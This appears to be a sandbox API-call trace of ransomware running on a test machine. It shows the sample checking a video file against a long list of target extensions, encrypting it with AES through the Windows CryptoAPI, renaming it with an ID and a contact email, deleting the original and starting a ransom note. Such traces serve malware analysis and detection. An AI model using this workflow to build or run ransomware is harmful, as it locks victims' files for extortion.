	[0201.322] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.322] lstrcpyW (in: lpString1=0x18855c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv"
	[0201.322] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv") returned 124
	[0201.322] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.322] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.322] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0201.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.323] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.323] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.323] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.323] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0201.327] ReadFile (in: hFile=0x3ac, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0x957f, lpNumberOfBytesRead=0x187f10, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x187f10*=0x957f, lpOverlapped=0x0) returned 1
	[0201.337] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.338] CryptAcquireContextW (in: phProv=0x187ac0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x187ac0*=0xfcb770) returned 1
	[0201.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.340] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x187ac4 | out: phHash=0x187ac4) returned 1
	[0201.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.340] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.340] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x187ac8 | out: phKey=0x187ac8*=0xfb9430) returned 1
	[0201.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.341] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x187adc*=0x957f, dwBufLen=0x957f | out: pbData=0x0*, pdwDataLen=0x187adc*=0x9580) returned 1
	[0201.342] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.342] RtlMoveMemory (in: Destination=0xfea728, Source=0xfe11a0, Length=0x957f | out: Destination=0xfea728) 
	[0201.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.342] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfea728*, pdwDataLen=0x187abc*=0x957f, dwBufLen=0x9580 | out: pbData=0xfea728*, pdwDataLen=0x187abc*=0x9580) returned 1
	[0201.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.344] CryptDestroyKey (hKey=0xfb9430) returned 1
	[0201.345] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.345] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0201.345] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.350] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0201.351] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.351] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187ad8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187ad8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.352] GetUserNameA (in: lpBuffer=0x1879bc, pcbBuffer=0x187ad4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187ad4) returned 1
	[0201.353] wsprintfW (in: param_1=0x187af0, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 166
	[0201.353] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0
	[0201.353] WriteFile (in: hFile=0x3b0, lpBuffer=0xfea728*, nNumberOfBytesToWrite=0x9580, lpNumberOfBytesWritten=0x187f18, lpOverlapped=0x0 | out: lpBuffer=0xfea728*, lpNumberOfBytesWritten=0x187f18*=0x9580, lpOverlapped=0x0) returned 1
	[0201.358] CloseHandle (hObject=0x3b0) returned 1
	[0201.358] CloseHandle (hObject=0x3ac) returned 1
	[0201.358] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv")) returned 1
	[0201.366] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\vuzp5x 8.flv")) returned 0
	[0201.366] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1642c310, ftCreationTime.dwHighDateTime=0x1d97204, ftLastAccessTime.dwLowDateTime=0xe7224640, ftLastAccessTime.dwHighDateTime=0x1d97673, ftLastWriteTime.dwLowDateTime=0xe7224640, ftLastWriteTime.dwHighDateTime=0x1d97673, nFileSizeHigh=0x0, nFileSizeLow=0x957f, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="vuzp5x 8.flv", cAlternateFileName="VUZP5X~1.FLV")) returned 0
	[0201.366] FindClose (in: hFindFile=0xfb92b0 | out: hFindFile=0xfb92b0) returned 1
	[0201.366] FindClose (in: hFindFile=0xfb92b0 | out: hFindFile=0xfb92b0) returned 0
	[0201.367] lstrcpyW (in: lpString1=0x188354, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg"
	[0201.367] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\*.*"
	[0201.367] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.367] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.367] wsprintfW (in: param_1=0x187c40, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\HELP_DECRYPT_YOUR_FILES.TXT") returned 139
	[0201.367] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
